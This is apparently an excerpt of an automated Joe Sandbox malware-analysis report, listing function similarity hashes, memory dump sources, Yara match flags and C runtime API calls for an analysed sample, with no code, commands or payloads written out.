                                                                                                                                                                                                                              • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction ID: 579d29facf077766aef00f5492100953b4ad9333dd051a90c9b33ed3c9941cc2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C51426170964996DB388A7CB559BBE239BFB02200F1809DAD847CB29DC60DFA85C353
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                              • Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                              • Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: 7c604cf6cfdb4f040104d3bf2d572cb7ab82ad6c4c731e111b1b9ffafdfff707
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9191787210D0A349DB2D863E893943EFFE2AA421A171A17DED4F3CB1C5EE1CE954D620
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: 3a903006dba860a8977ece2f444d1af55c821ff29ea3203191e1b59032d9efd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D191677310D0A34ADB69867E857443DFFE2AA421A171A07DED4F2CB1C5EE1CE964D620
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: af0ac7b9af554bb12abcdc3adc0b428afe9db77673e54655316bb3be25954aed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5191547320D0A34ADB6D467E947443DFFE2AA421A171A07DED4F3CB1C5EE28E9649620
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 2ccc2eb4f670f454c0ec46af87c94f38df20cd74bbed59f7a84a080b37bba72d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D081357220D0A349DB6D863E857443EFFF2BA412A171A07DED4F2CB1D5EE28E5549A20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction ID: 48fcd24739efd809226944d50d5747ead5df71206d7195a77cc277b730b4ef37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC11CE72340100AFD740DF55DC94FA673EAEB88724B298069EE08DB712E675F802CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction ID: 5fb5662c0881b5a530a597c0c07e39e05140bee6fa8575176e796b07bc480be3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C101F276A006089FDF21EF21C809FBE33E5FB86206F0541E4D90B97281E378B8418F80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                              • Instruction ID: 85fae22f7d8188fb7ad4ae3c1274dc4a8fc6c58e5757f727e641af9e5f495b07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6B19F75E002099FDB21DFB9C884BAEF7F5FF08300F5440ADE9A5A7251EB35A9419B60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                              • Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 05B7F7CC
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB38
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB4A
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB5C
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB6E
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB80
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EB92
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBA4
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBB6
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBC8
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBDA
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBEC
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EBFE
                                                                                                                                                                                                                                • Part of subcall function 05B7EB1B: _free.LIBCMT ref: 05B7EC10
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F7C1
                                                                                                                                                                                                                                • Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
                                                                                                                                                                                                                                • Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F7E3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F7F8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F803
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F825
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F838
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F846
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F851
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F889
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F890
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F8AD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7F8C5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction ID: 7a4769feeb49fe682ef4287071732a9a45b588056a28501cd9f8dfde2abd5b7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42313931A0460DDFEB31AB78D888B7A77E9FF00210F1444A9E469D7150EF32F9819625
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0041F565
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F55A
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F57C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F591
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F59C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5BE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5D1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5DF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5EA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F622
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F629
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F646
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F65E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
